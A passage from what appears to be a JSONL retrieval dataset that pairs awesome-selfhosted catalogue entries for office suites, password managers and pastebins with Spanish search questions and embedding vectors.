Collaboration suite built to enable collaboration, synchronizing changes to documents in real time [AGPL-3.0, Nodejs/Docker]. Digislides β€” Create multimedia presentations in a quick and easy way. (documentation in French) [AGPL-3.0, Nodejs/PHP]. Etherpad β€” Highly customizable online editor providing collaborative editing in real-time [Apache-2.0, Nodejs/Docker]. Grist β€” Next-generation spreadsheet with relational structure, formula-based access control, and a portable, self-contained format (alternative to Airtable) [Apache-2.0, Nodejs/Python/Docker]. ONLYOFFICE β€” Office suite that enables you to manage documents, projects, team and customer relations in one place [AGPL-3.0, Nodejs/Docker].", "indexar": "quΓ© alternativa libre a Airtable hay para hojas de cΓ‘lculo relacionales?", "v": [-0.11812, 0.06294, -0.06213, -0.03936, -0.05118, -0.05332, 0.09124, 0.0188, -0.13574, 0.03112, -0.08806, -0.19425, 0.05884, 0.08757, 0.20737, -0.05834, 0.09599, -0.09607, 0.00645, -0.05977, -0.05196, -0.0895, -0.19536, -0.03173, -0.20314, 0.01532, -0.03389, 0.08109, -0.11578, 0.08808, -0.06049, -0.05486, 0.07865, -0.00531, -0.10421, 0.21636, 0.02269, 0.16132, 0.07218, -0.18038, -0.04451, 0.00718, -0.08798, 0.066, -0.07742, -0.02411, -0.10067, 0.07136, -0.10785, 0.00492, -0.04646, -0.00188, 0.04277, 0.01132, 0.06579, -0.05168, 0.04803, -0.00532, -0.1085, -0.02739, 0.00217, 0.124, -0.02566, -0.04385, -0.00543, -0.01672, 0.02896, -0.05989, 0.07786, 0.03723, 0.04587, 0.01593, 0.03756, -0.03924, -0.09616, 0.0047, 0.02876, -0.01235, -0.02049, 0.01316, 0.03171, -0.08255, 0.00667, 0.03675, -0.00997, -0.01263, 0.10178, -0.05833, 0.10266, 0.14567, 0.00564, -0.05699, -0.03072, 0.15354, -0.01472, -0.01152, -0.01082, 0.03866, -0.06294, 0.05383, 0.03795, 0.062, -0.06452, -0.01706, -0.01663, 0.04728, -0.07536, 0.03111, -0.1227, 0.05098, 0.02864, -0.00495, 0.06523, 0.03817, 0.04206, -0.04503, 0.0074, 0.10807, -0.04127, 0.01764, 0.08629, -0.02869, -0.02608, -0.09583, -0.00282, -0.00451, 0.06544, 0.11902, -0.00446, 0.1151, -0.03188, -0.10232, -0.06353, -0.077, 0.01272, -0.06355, 0.05097, -0.08117, 0.03691, 0.01457, -0.01649, 0.05404, -0.04819, -0.05555, -0.03014, -0.05324, 0.05171, 0.08584, -0.02685, -0.08223, -0.05457, 0.03337, -0.03584, 0.12786, 0.03403, -0.01217, -0.02896, 0.01968, -0.15041, 0.03537, -0.01061, -0.01828, 0.05829, -0.01047, 0.06309, -0.01982, 0.04535, 0.004, 0.00129, 0.03767, -0.00107, 0.03768, 0.06447, -0.05167, 0.04272, -0.05509, 0.01058, -0.03677, -0.06458, -0.00085, -0.0124, 0.03677, -0.01612, -0.0391, -0.03799, -0.01153, 0.04057, 0.0137, 0.03812, 0.0416, -0.0703, 0.03648, -0.0209, -0.03705, -0.00137, 0.02133, 0.01446, -0.04524, 0.00508, 0.02109, -0.02548, -0.00581, -0.01553, 0.01205, 0.02478, 0.04585, -0.0258, 0.11856, 0.02265, 0.01702, 0.0493, 0.01842, 0.02941, -0.01389, -0.02188, 0.02899, 0.02388, 0.01917, 0.06141, -0.01119, 0.08075, -0.02191, -0.04154, 0.0162, 0.01884, 0.04086, -0.04684, 0.04902, 0.0085, 0.00568, 0.04587, -0.01203, 0.04321, 0.05926, -0.03834, -0.0227, 0.03884, 0.05614, -0.01207, 0.02047, 0.03769, 0.00896, -0.02227, 0.00837, -0.09096, 0.01799, -0.01531, -0.00967, -0.0095, -0.02333, -0.02134, 0.0127, -0.01091, 0.02919, -0.04202, -0.00146]} +{"tipo": "pregunta", "herramienta": "Office Suites", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Office Suites", "tema": "office suites", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Office Suites: Collabora Online Development Edition β€” Collabora Online Development Edition (CODE) is a powerful LibreOffice-based online office that supports all major document, spreadsheet and presentation file formats, which you can integrate in your own infrastructure [MPL-2.0, C++]. CryptPad β€” Collaboration suite built to enable collaboration, synchronizing changes to documents in real time [AGPL-3.0, Nodejs/Docker]. Digislides β€” Create multimedia presentations in a quick and easy way. (documentation in French) [AGPL-3.0, Nodejs/PHP]. Etherpad β€” Highly customizable online editor providing collaborative editing in real-time [Apache-2.0, Nodejs/Docker]. Grist β€” Next-generation spreadsheet with relational structure, formula-based access control, and a portable, self-contained format (alternative to Airtable) [Apache-2.0, Nodejs/Python/Docker]. ONLYOFFICE β€” Office suite that enables you to manage documents, projects, team and customer relations in one place [AGPL-3.0, Nodejs/Docker].", "indexar": "que herramienta sirve para editar documentos colaborativamente en tiempo real", "v": [0.10927, 0.09212, -0.14298, -0.1315, 0.12267, -0.16578, -0.00634, -0.00543, 0.0389, -0.05589, -0.08557, -0.13387, 0.09996, -0.1309, 0.06647, 0.0458, 0.16018, -0.14466, -0.02471, -0.036, 0.04336, 0.01829, -0.10912, 0.01288, -0.01359, -0.07896, 0.06195, -0.05775, -0.09438, 0.07624, 0.05055, 0.06668, -0.00221, -0.0629, -0.11854, -0.00439, 0.00327, -0.00534, -0.07785, 0.02058, 0.00937, 0.05503, -0.09243, 0.09764, -0.03382, 0.08101, -0.05727, 0.06815, -0.09246, 0.1018, -0.06904, -0.12267, -0.08288, 0.02762, -0.0811, -0.14216, 0.19819, -0.19416, -0.0367, -0.14032, -0.13791, -0.00746, -0.10553, -0.02629, 0.00534, 0.02221, 0.05041, -0.06898, -0.03295, 0.0938, -0.11852, 0.05714, 0.07745, -0.088, -0.08015, -0.08815, 0.00493, 0.0029, -0.03984, 0.00204, 0.14176, 0.01486, -0.01352, 0.04841, -0.04681, -0.08128, 0.10881, -0.075, 0.08224, -0.01824, -0.06756, 0.11325, 0.04006, 0.00704, 0.0516, 0.0195, 0.05642, -0.07761, 0.0188, 0.02426, 0.12883, -0.0594, -0.05671, -0.06912, -0.0469, 0.05122, -0.07505, 0.00378, -0.05773, 0.03764, 0.05698, 0.07142, 0.01859, 0.05059, 0.05291, 0.0277, 0.02893, -0.05245, -0.03808, -0.09455, 0.07264, 0.00497, -0.09093, -0.0361, 0.00503, -0.02427, -0.02746, -0.01894, 0.01536, -0.08166, -0.0367, -0.0032, -0.09312, 0.03266, 0.00924, -0.04982, -0.01356, -0.06683, -0.0215, -0.09009, 0.0307, -0.01658, -0.04415, -0.09902, -0.03999, -0.00506, 0.00656, 0.03057, -0.01007, -0.03508, 0.06468, -0.07107, 0.00104, 0.03035, -0.03716, 0.00743, -0.01715, 0.06205, -0.1349, -0.00129, 0.00421, -0.00019, -0.01053, -0.00524, -0.00489, -0.07612, 0.04507, 0.057, 0.08124, 0.03034, 0.082, -0.00998, 0.07832, -0.07447, -0.01347, -0.05247, -0.04497, 0.00201, -0.00824, -0.08389, -0.01498, -0.02093, 0.00283, 0.00276, 0.02201, -0.01535, 0.05528, -0.03247, 0.01581, -0.01349, 0.01148, 0.00696, 0.06442, -0.00406, -0.01135, 0.00094, 0.00706, -0.06169, 0.03243, -0.03575, -0.00564, -0.04842, 0.01915, 0.00449, 0.02628, 0.07897, -0.05266, 0.03855, 0.00308, 0.03445, -0.0268, 0.01058, 0.00493, -0.01219, -0.03879, -0.028, -0.00768, -0.00751, -0.03668, -0.01768, 0.04962, -0.06035, 0.03773, -0.05548, 0.03289, 0.00483, 0.06338, 0.05632, -0.00485, -0.04879, 0.02831, -0.00716, -0.00145, -0.00873, 0.00613, -0.04657, 0.05853, -0.02764, -0.03687, -0.06198, -0.01639, 0.0156, -0.02071, -0.00612, -0.0472, -0.03497, -0.01551, -0.07239, 0.00456, -0.05795, -0.03524, 0.01074, 0.077, -0.03017, 0.05051, -0.06133]} +{"tipo": "pregunta", "herramienta": "Password Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Password Managers", "tema": "password managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Password Managers: AliasVault β€” End-to-end encrypted password manager with a built-in email alias generator and server [MIT, Docker]. Bitwarden β€” Password manager with a webapp, browser extension, and mobile app [⚠, AGPL-3.0, Docker/C#]. Passbolt β€” Collaborative password manager [AGPL-3.0, PHP/deb/K8S/Docker]. PassIt β€” Simple password manage with sharing features by group and user, but no administration interface [AGPL-3.0, Docker/Python]. Psono β€” Password manager for companies [Apache-2.0, Python]. Teampass β€” Password manager dedicated for managing passwords in a collaborative way. One symmetric key is used to encrypt all shared/team passwords and stored server side in a file and the database. works on any server Apache, MySQL and PHP [GPL-3.0, PHP]. Vaultwarden β€” Lightweight Bitwarden server API implementation written in Rust [GPL-3.0, Rust/Docker].", "indexar": "que programa puedo usar para gestionar contraseΓ±as de forma segura y encriptarlas end-to-end?", "v": [-2e-05, -0.01489, -0.179, -0.18585, 0.08236, -0.16841, -0.09075, -0.03213, -0.08527, -0.06432, -0.04604, -0.05246, 0.01863, -0.06331, -0.00182, -0.03524, 0.03358, -0.10799, 0.02649, 0.0911, -4e-05, -0.12196, -0.02289, -0.09266, -0.0773, 0.00515, 0.05913, 0.01397, -0.04292, 0.02045, -0.0049, 0.04389, 0.11994, -0.01921, -0.01326, 0.12066, -0.07916, 0.08928, 0.01396, 0.13791, 0.02448, 0.01968, -0.01074, 0.03587, 0.05694, 0.00711, 0.03986, 0.012, 0.08549, -0.07949, -0.09972, -0.17306, -0.12893, -0.07305, 0.02377, -0.10263, 0.02861, -0.10842, -0.05554, -0.00177, -0.10234, 0.05459, 0.01788, 0.18314, 0.01309, -0.10601, 0.05495, -0.00175, -0.13845, 0.08947, 0.01656, 0.03372, -0.07281, 0.12131, 0.08255, 0.00235, -0.02039, -0.00064, 0.08221, 0.13217, -0.12651, 0.00614, 0.043, 0.03936, -0.17338, -0.02195, 0.0381, -0.00055, -0.02184, -0.04778, 0.01035, -0.00507, -0.00589, -0.02482, -0.01992, -0.05055, 0.00797, 0.01691, -0.10982, -0.03163, 0.03994, 0.03868, -0.01378, 0.14463, -0.05686, 0.05211, 0.02408, 0.01001, 0.07745, -0.08778, -0.03796, 0.0561, -0.07571, -0.07379, -0.06187, 0.02891, -0.01074, -0.04286, 0.1059, -0.068, -0.03462, -0.0349, -0.00077, 0.01777, 0.13633, 0.07255, -0.02794, 0.11553, -0.07627, -0.02986, -0.07832, -0.04547, -0.09329, 0.00588, -0.05848, 0.01042, -0.00967, -0.07372, -0.06225, -0.04977, -0.02949, 0.07484, -0.02169, 0.0194, 0.08388, -0.01511, -0.00056, -0.06165, 0.00553, 0.02229, 0.03554, 0.03305, 0.00478, 0.03109, -0.07157, 0.01795, 8e-05, -0.09881, -0.06158, 0.15436, -0.02227, -0.00933, -0.03154, 0.02781, -0.00839, -0.02993, 0.05548, 0.0533, -0.01566, 0.0106, 0.05602, 0.06831, 0.0675, -0.0401, 0.01118, -0.0554, -0.02621, -0.086, -0.00612, -0.09513, 0.01411, -0.01984, -0.00764, 0.0222, 0.02302, -0.03114, 0.0259, 0.06217, -0.05527, 0.00814, 0.01401, 0.02067, -0.01715, 0.04078, -0.02376, -0.0117, 0.00808, 0.01335, -0.01596, -0.04821, -0.02077, 0.01121, -0.02181, -0.01611, 0.06123, 0.06836, -0.084, 0.00076, 0.04932, 0.0475, 0.06616, -0.03336, 0.01084, -0.03358, -0.05528, -0.08501, -0.0114, 0.10028, -0.00766, -0.00853, 0.01418, 0.02724, 0.04356, 0.02737, 0.045, -0.09083, -0.00652, 0.03812, 0.01938, -0.00962, 0.00484, 0.03628, -0.03839, 0.02735, 0.09859, -0.04112, -0.05676, -0.05406, -0.00543, -0.09539, -0.05623, 0.08772, 0.01467, -0.06408, -0.0605, -0.01641, -0.10615, 0.0662, 0.0017, -0.02422, -0.04248, 0.01358, 0.02902, -0.02042, -0.00643, -0.00591]} +{"tipo": "pregunta", "herramienta": "Password Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Password Managers", "tema": "password managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Password Managers: AliasVault β€” End-to-end encrypted password manager with a built-in email alias generator and server [MIT, Docker]. Bitwarden β€” Password manager with a webapp, browser extension, and mobile app [⚠, AGPL-3.0, Docker/C#]. Passbolt β€” Collaborative password manager [AGPL-3.0, PHP/deb/K8S/Docker]. PassIt β€” Simple password manage with sharing features by group and user, but no administration interface [AGPL-3.0, Docker/Python]. Psono β€” Password manager for companies [Apache-2.0, Python]. Teampass β€” Password manager dedicated for managing passwords in a collaborative way. One symmetric key is used to encrypt all shared/team passwords and stored server side in a file and the database. works on any server Apache, MySQL and PHP [GPL-3.0, PHP]. Vaultwarden β€” Lightweight Bitwarden server API implementation written in Rust [GPL-3.0, Rust/Docker].", "indexar": "existe alguna alternativa libre a Bitwarden que funcione como servidor propio?", "v": [-0.13803, 0.13175, -0.24904, -0.02188, -0.07797, -0.12583, -0.00042, -0.17801, -0.13097, -0.13202, 0.00806, -0.13346, 0.05378, 0.05663, 0.18915, -0.05538, 0.10205, -0.1717, 0.09743, -0.08383, -0.04449, 0.02108, 0.04835, -0.04098, -0.03495, -0.01153, 0.06103, -0.00193, -0.08817, 0.07826, 0.08352, -0.01625, 0.1359, -0.0325, -0.01592, -0.09664, -0.00164, 0.1154, 0.02364, 0.01733, 0.06768, 0.00249, -0.03552, 0.1151, -0.07017, -0.01264, -0.03837, -0.04715, 0.04235, 0.05024, -0.06203, -0.1168, -0.08685, 0.04071, 0.02561, 0.03045, 0.10877, -0.18414, 0.02562, 0.00642, -0.1328, 0.04728, 0.04876, -0.10725, 0.07075, 0.00679, -0.0401, -0.03581, -0.0498, 0.04834, -0.0684, 0.0405, -0.01672, -0.05045, -0.01771, 0.05997, -0.02867, -0.00508, 0.00854, 0.09108, 0.03005, -0.00926, -0.00967, 0.05217, -0.1129, -0.11843, 0.06772, -0.14374, 0.04249, 0.0505, 0.04539, 0.07847, -0.05435, 0.14671, 0.02202, -0.05321, 0.05556, 0.02455, 0.03885, 0.03421, 0.11928, 0.08792, -0.06371, -0.03922, 0.05392, 0.08577, 0.10542, -0.04417, 0.00248, 0.02126, 0.01739, 0.01738, -0.04185, 0.00013, -0.0739, -0.08826, -0.06742, 0.00838, 0.04027, 0.09159, -0.07219, -0.05891, 0.0382, 0.00059, -0.00281, -0.00818, 0.00782, 0.02287, -0.02424, -0.00074, 0.04407, -0.03656, -0.07338, -0.07308, -0.0858, 0.01281, 0.09114, -0.00327, -0.0133, -0.04173, 0.02154, 0.04807, -0.00778, -0.04737, 0.05861, 0.00867, 0.09028, -0.05993, -0.0559, 0.01449, -0.02937, -0.04843, -0.05636, 0.08393, -0.06971, 0.00939, 0.01351, -0.07089, -0.02292, 0.13902, 0.03231, -0.01571, -0.03168, 0.06508, -0.03805, 0.00449, 0.00187, 0.04453, -0.01191, 0.03129, -0.06661, 0.0523, 0.02561, -0.12062, 0.05542, -0.04953, -0.09453, -0.05584, 0.0785, -0.01565, 0.01088, 0.01445, -0.04616, -0.05806, -0.02941, -0.03441, -0.04992, 0.0217, -0.00869, 0.02779, 0.04512, -0.037, -0.0961, 0.00126, -0.01629, -0.01197, -0.00787, -0.07696, -0.0186, -0.01494, -0.03681, -0.03946, 0.0057, -0.02947, -0.01616, -0.0215, -0.03697, 0.05757, 0.03527, 0.04849, 0.03305, -0.00989, 0.06953, -0.01107, -0.02078, 0.00819, 0.04681, -0.07017, -0.01659, -0.05063, 0.02536, 0.01838, 0.0129, 0.02215, 0.0374, 0.05808, 0.01578, 0.02078, 0.05522, 0.00141, -0.01868, -0.00104, -0.02415, -0.00264, 0.01326, -0.0185, 0.02776, 0.0108, -0.02502, -0.04183, 0.03098, 0.04996, -0.00111, -0.06331, -0.0194, -0.05743, -0.03536, -0.02263, -0.02187, -0.03264, -0.00348, -0.00727, -0.00298, -0.00775, -0.0032, -0.00287]} +{"tipo": "pregunta", "herramienta": "Password Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Password Managers", "tema": "password managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Password Managers: AliasVault β€” End-to-end encrypted password manager with a built-in email alias generator and server [MIT, Docker]. Bitwarden β€” Password manager with a webapp, browser extension, and mobile app [⚠, AGPL-3.0, Docker/C#]. Passbolt β€” Collaborative password manager [AGPL-3.0, PHP/deb/K8S/Docker]. PassIt β€” Simple password manage with sharing features by group and user, but no administration interface [AGPL-3.0, Docker/Python]. Psono β€” Password manager for companies [Apache-2.0, Python]. Teampass β€” Password manager dedicated for managing passwords in a collaborative way. One symmetric key is used to encrypt all shared/team passwords and stored server side in a file and the database. works on any server Apache, MySQL and PHP [GPL-3.0, PHP]. Vaultwarden β€” Lightweight Bitwarden server API implementation written in Rust [GPL-3.0, Rust/Docker].", "indexar": "con quΓ© herramienta puedo colaborar en equipo para manejar nuestras contraseΓ±as compartidas?", "v": [0.17528, 0.12233, -0.18844, -0.20152, -0.00442, -0.11222, -0.03538, -0.01564, -0.12004, -0.122, -0.04132, 0.0695, -0.00132, -0.06089, 0.01084, 0.1334, 0.17222, 0.01818, 0.04027, 0.072, 0.03779, -0.00732, -0.05685, -0.00761, 0.02678, -0.0923, 0.07399, -0.02685, -0.20905, 0.01808, 0.02013, 0.05509, 0.05009, 0.03946, 0.01564, 0.03966, -0.0395, 0.09025, 0.03423, -0.0161, -0.04997, 0.05517, -0.18295, 0.00395, 0.05595, 0.056, -0.06856, 0.01491, 0.08206, 0.01913, -0.08376, -0.13749, -0.05232, -0.11422, -0.02492, -0.1235, 0.27554, -0.08039, -0.04883, -0.07739, -0.12481, -0.02813, -0.03515, 0.07436, -0.10282, -0.06304, -0.02798, -0.06614, -0.10675, 0.11443, -0.04488, 0.06203, -0.0224, -0.06363, -0.04816, 0.01289, 0.06773, 0.038, 0.04361, 0.06301, 0.04779, 0.02117, 0.05277, 0.00233, -0.00606, -0.05732, 0.10288, -0.03009, 0.05724, -0.13053, 0.0433, -0.01791, -0.06515, -0.01948, -0.01903, 0.00109, 0.09973, 0.04113, -0.04447, -0.02731, 0.04764, -0.01036, -0.03955, 0.05442, -0.07328, 0.03907, -0.04267, -0.00596, -0.00707, -0.03567, 0.12699, -0.01434, -0.03191, -0.02108, 0.00183, 0.06024, -0.06228, -0.04494, 0.02551, -0.06546, 0.01938, -0.00538, 0.02343, -0.01196, 0.05986, -0.02815, 0.02219, 0.09425, -0.00545, -0.08118, -0.10964, 0.01401, -0.04135, 0.06529, -0.00787, 0.06764, 0.00213, -0.10445, -0.08362, -0.04761, 0.02277, 0.00014, 0.01141, -0.12623, 0.0205, 0.06388, 0.02681, -0.0187, -0.02621, -0.01931, 0.06719, -0.02772, 0.00513, 0.03191, -0.05992, 0.0611, 0.02362, -0.03507, -0.12707, 0.07667, -0.02858, -0.06461, -0.02001, 0.01567, -0.02728, -0.04087, 0.04789, 0.00292, 0.07381, 0.02861, -0.00109, 0.03025, 0.0398, -0.03859, -0.03833, -0.05191, -0.07841, -0.07398, -0.00808, -0.06839, -0.04154, -0.03366, -0.04501, 0.01667, 0.04296, -0.03712, 0.02479, 0.0472, 0.0186, 0.00278, 0.01396, 0.01388, 0.02928, -0.05572, 0.03925, -0.03622, -0.03251, -0.09093, 0.0457, -0.00618, 0.00442, 0.03755, -0.01014, -0.01444, 0.01923, 0.01841, -0.09725, 0.01786, -0.00873, 0.02605, 0.05574, -0.03051, 0.0043, -0.04262, -0.07165, 0.00162, -0.03963, 0.02373, -0.05595, 0.0033, 0.06787, 0.02216, 0.08521, -0.03264, 0.06301, 0.01842, -0.01999, 0.05542, 0.03025, 0.00928, 0.01804, 0.01218, -0.02197, 0.00682, 0.06237, -0.0015, -0.03088, -0.03797, -0.03215, -0.02318, -0.02539, 0.01762, 0.00761, -0.06052, -0.06475, -0.0286, -0.00763, 0.00627, 0.00291, -0.05996, -0.02607, 0.01161, 0.04922, -0.04077, 0.02154, -0.01852]} +{"tipo": "pregunta", "herramienta": "Pastebins", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Pastebins", "tema": "pastebins", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Pastebins: 1time β€” Zero-knowledge one-time secret sharing. Create a one-time link for a password, API key, or file. Encrypted client-side in the browser, never reaches the server in plaintext, self-destructs after the allowed number of views (one by default) [MIT, Docker]. BinPastes β€” Minimal pastebin supporting client-side encryption, fulltext search, one-time messages. Intended for one to few users looking for a simple pastebin deployment [Apache-2.0, Java]. ByteStash β€” Pastebin and file storage service with a simple web interface. Supports syntax highlighting, optional user authentication and public sharing [GPL-3.0, Docker]. Chiyogami β€” Pastebin with API, client-side encryption, user accounts, syntax highlighting, markdown rendering, and more [BSD-3-Clause, Docker]. dpaste β€” Simple pastebin with multiple text and code option, with short url result easy to remember [MIT, Docker/Python]. Hemmelig β€” Share encrypted secrets cross organizations, or as private persons [MIT, Docker/Nodejs].", "indexar": "que herramienta sirve para guardar mensajes de texto con encriptaciΓ³n y no que nadie mΓ‘s pueda leerlos?", "v": [-0.05638, 0.04146, -0.12929, -0.09707, 0.00809, -0.21243, -0.13833, 0.07161, 0.07551, -0.14605, -0.0372, -0.03595, 0.07218, -0.04927, 0.07934, 0.05655, 0.08402, 0.01618, 0.02758, 0.03799, 0.02286, -0.02381, -0.06797, -0.08006, -0.105, -0.05745, 0.07751, -0.04333, -0.10442, 0.11476, -0.06065, -0.00015, 0.15388, -0.09839, -0.01001, 0.06965, 0.02817, 0.06687, -0.12339, 0.21068, 0.10411, 0.08086, -0.01412, 0.03006, -0.09967, -0.0947, -0.02367, 0.06331, 0.02525, 0.05372, -0.0379, -0.16833, -0.09544, 0.01639, -0.10207, -0.02584, 0.25591, -0.02045, 0.05224, -0.09452, -0.11868, 0.07207, -0.03935, -0.05401, -0.03581, -0.03785, -0.01058, -0.01111, -0.16685, 0.08083, -0.0427, 0.10562, -0.01861, 0.13145, 0.04436, 0.08396, -0.10598, 0.07758, -0.04027, 0.1491, -0.02248, -0.05619, -0.08504, -0.01142, -0.01597, -0.06629, 0.0172, 0.01684, 0.0357, -0.06622, 0.03866, 0.03133, -0.02706, -0.01866, 0.03171, -0.02672, 0.01086, -0.04709, 0.00278, 0.01263, 0.12875, -0.09363, -0.02958, 0.00559, -0.00985, -0.0039, 0.00602, -0.01546, 0.06984, -0.00032, 0.09813, -0.00188, -0.0147, -0.02672, 0.00685, 0.01426, -0.00914, -0.04865, 0.04942, -0.05466, -0.0653, 0.04282, -0.04026, 0.02999, 0.06407, 0.00459, -0.02558, 0.0149, -0.03366, 0.00511, -0.09931, -0.06826, -0.14274, -0.0188, -0.03695, 0.00777, -0.04065, -0.04026, -0.04901, -0.01365, 0.00608, 0.11482, -0.05961, -0.03091, 0.0173, 0.03863, -0.02224, -0.05114, -0.02256, -0.01551, 0.08428, 0.02019, 0.0192, 0.01592, -0.02796, -0.04378, 0.02833, -0.06154, -0.05139, 0.04877, -0.06294, 0.00513, 0.01916, 0.05044, 0.00955, -0.04485, -0.00819, 0.00194, 0.01918, 0.01113, 0.00272, -0.03667, 0.06643, -0.04414, -0.02131, -0.05061, -0.00514, 0.00548, -0.06291, -0.08196, -0.04325, -0.01683, -0.04344, 0.01461, 0.05388, -0.01321, 0.05016, -0.01963, -0.00791, 0.01716, 0.00102, 0.00659, -0.06942, 0.00426, -0.05695, 0.01373, -0.06179, -0.01789, 0.05565, -0.01506, -0.07136, -0.02157, -0.02247, 0.0285, -0.02516, -0.00994, -0.09471, -0.02083, -0.06962, 0.0607, 0.07393, -0.03498, 0.02335, -0.05585, -0.04966, -0.02523, 0.04285, 0.02773, -0.03376, 0.02029, 0.04683, 0.01907, 0.05516, -0.06848, -0.00928, 0.01603, -0.00519, 0.05834, 0.04436, 0.04349, -0.02025, 0.02227, -0.04976, 0.0567, 0.07316, -0.03748, -0.04132, -0.02892, -0.05057, -0.09547, -0.03113, 0.04051, 0.00307, -0.03838, -0.03223, -0.04336, -0.06725, 0.04305, -0.06017, -0.05514, -0.0294, -0.04145, 0.03865, -0.07491, 0.05685, -0.05255]} +{"tipo": "pregunta", "herramienta": "Pastebins", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Pastebins", "tema": "pastebins", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Pastebins: 1time β€” Zero-knowledge one-time secret sharing. Create a one-time link for a password, API key, or file. Encrypted client-side in the browser, never reaches the server in plaintext, self-destructs after the allowed number of views (one by default) [MIT, Docker]. BinPastes β€” Minimal pastebin supporting client-side encryption, fulltext search, one-time messages. Intended for one to few users looking for a simple pastebin deployment [Apache-2.0, Java]. ByteStash β€” Pastebin and file storage service with a simple web interface. Supports syntax highlighting, optional user authentication and public sharing [GPL-3.0, Docker]. Chiyogami β€” Pastebin with API, client-side encryption, user accounts, syntax highlighting, markdown rendering, and more [BSD-3-Clause, Docker]. dpaste β€” Simple pastebin with multiple text and code option, with short url result easy to remember [MIT, Docker/Python]. Hemmelig β€” Share encrypted secrets cross organizations, or as private persons [MIT, Docker/Nodejs].", "indexar": "cual es una alternativa libre a pastebin que permita encriptar el contenido antes de enviarse al servidor?", "v": [-0.05774, 0.01406, -0.14919, -0.09608, -0.01724, -0.184, 0.03136, -0.1197, -0.10199, -0.11199, -0.04029, -0.13458, 0.05266, -0.00755, 0.07457, -0.00094, 0.11972, -0.06331, 0.15714, 0.04143, 0.04339, -0.08091, -0.00533, -0.0841, -0.13558, -0.02483, 0.05207, 0.04377, -0.09563, -0.00842, -0.0, -0.05603, 0.07716, 0.03298, 0.10683, -0.02761, 0.01772, 0.11925, -0.05785, 0.09963, 0.15183, -0.06258, -0.02419, 0.08861, -0.10099, -0.05245, -0.0406, 0.04849, 0.1123, -0.00147, -0.08123, -0.1284, -0.14749, 0.03262, -0.01583, 0.00828, 0.1192, -0.20778, -0.01371, -0.05434, -0.07384, 0.09814, 0.00842, -0.06689, 0.05377, -0.02139, -0.06495, 0.01747, -0.182, 0.04553, 0.05058, 0.01373, -0.09883, 0.01869, -0.00811, 0.04884, -0.11871, 0.00876, -0.02974, 0.15919, 0.01663, -0.02919, 0.03537, 0.09705, -0.09161, -0.04446, 0.05414, -0.02875, -0.00058, 0.03701, 0.078, 0.08654, -0.00662, 0.12628, 0.00949, -0.10955, 0.02705, -0.01615, -0.03907, 0.0747, 0.09211, 0.06768, -0.06237, 0.03547, 0.01651, 0.04438, 0.03838, -0.04011, 0.06475, -0.02747, 0.00098, 0.00162, -0.08133, -0.01654, -0.09299, -0.11035, -0.01886, -0.01157, 0.03967, 0.00369, -0.0861, -0.00195, -0.03857, 0.01689, 0.02404, 0.02894, 0.03351, 0.03061, -0.04825, -0.01856, -0.04147, -0.05151, -0.08731, -0.03241, -0.08789, -0.00536, 0.0456, -0.06805, -0.0233, 0.02156, 0.01021, 0.02954, -0.01381, 0.01757, 0.08749, 0.0002, 0.02674, -0.10023, -0.07889, -0.00203, -0.04184, -0.0053, -0.03729, 0.04443, -0.0639, 0.0133, -0.01761, -0.11015, -0.06004, 0.11336, 0.04031, 0.04674, 0.01603, 0.04319, -0.04029, -0.04655, 0.0139, 0.04742, -0.04736, 0.0156, 0.01138, 0.01614, 0.03064, -0.07264, 0.04182, -0.07405, -0.02801, -0.10151, -0.01295, -0.03154, 0.03121, 0.01277, -0.06796, 0.02776, -0.03088, -0.06445, -0.00909, -0.012, -0.0197, 0.01648, -0.02276, 0.00787, -0.08368, 0.01521, -0.02155, -0.03338, -0.02749, -0.04933, 0.01341, -0.0093, -0.03943, -0.02057, -0.03493, -0.02713, -0.02854, -0.01594, -0.07397, 0.01549, -0.02726, 0.02745, 0.01777, -0.02088, 0.09229, -0.03374, 0.00278, -0.00391, 0.07273, -0.0131, -0.08045, -0.02185, 0.0627, 0.0257, 0.07805, -0.0615, 0.00275, 0.01756, 0.01714, 0.04486, 0.05809, -0.00039, -0.02425, 0.04133, -0.08604, 0.00395, 0.07646, 0.00212, -0.00792, -0.02164, -0.00379, -0.11657, 0.0355, 0.06671, -0.04343, -0.07261, -0.00042, -0.01755, -0.0898, -0.01132, -0.03282, -0.07505, -0.01808, 0.00762, 0.02731, -0.07161, 0.03642, -0.02122]} +{"tipo": "pregunta", "herramienta": "Pastebins", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Pastebins", "tema": "pastebins", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Pastebins: 1time β€” Zero-knowledge one-time secret sharing. Create a one-time link for a password, API key, or file. Encrypted client-side in the browser, never reaches the server in plaintext, self-destructs after the allowed number of views (one by default) [MIT, Docker]. BinPastes β€” Minimal pastebin supporting client-side encryption, fulltext search, one-time messages. Intended for one to few users looking for a simple pastebin deployment [Apache-2.0, Java]. ByteStash β€” Pastebin and file storage service with a simple web interface. Supports syntax highlighting, optional user authentication and public sharing [GPL-3.0, Docker]. Chiyogami β€” Pastebin with API, client-side encryption, user accounts, syntax highlighting, markdown rendering, and more [BSD-3-Clause, Docker]. dpaste β€” Simple pastebin with multiple text and code option, with short url result easy to remember [MIT, Docker/Python]. Hemmelig β€” Share encrypted secrets cross organizations, or as private persons [MIT, Docker/Nodejs].", "indexar": "con quΓ© programa puedo crear un enlace temporal seguro para compartir contraseΓ±as o claves API?", "v": [-0.02972, 0.06886, -0.12407, -0.24688, -0.03561, -0.14089, 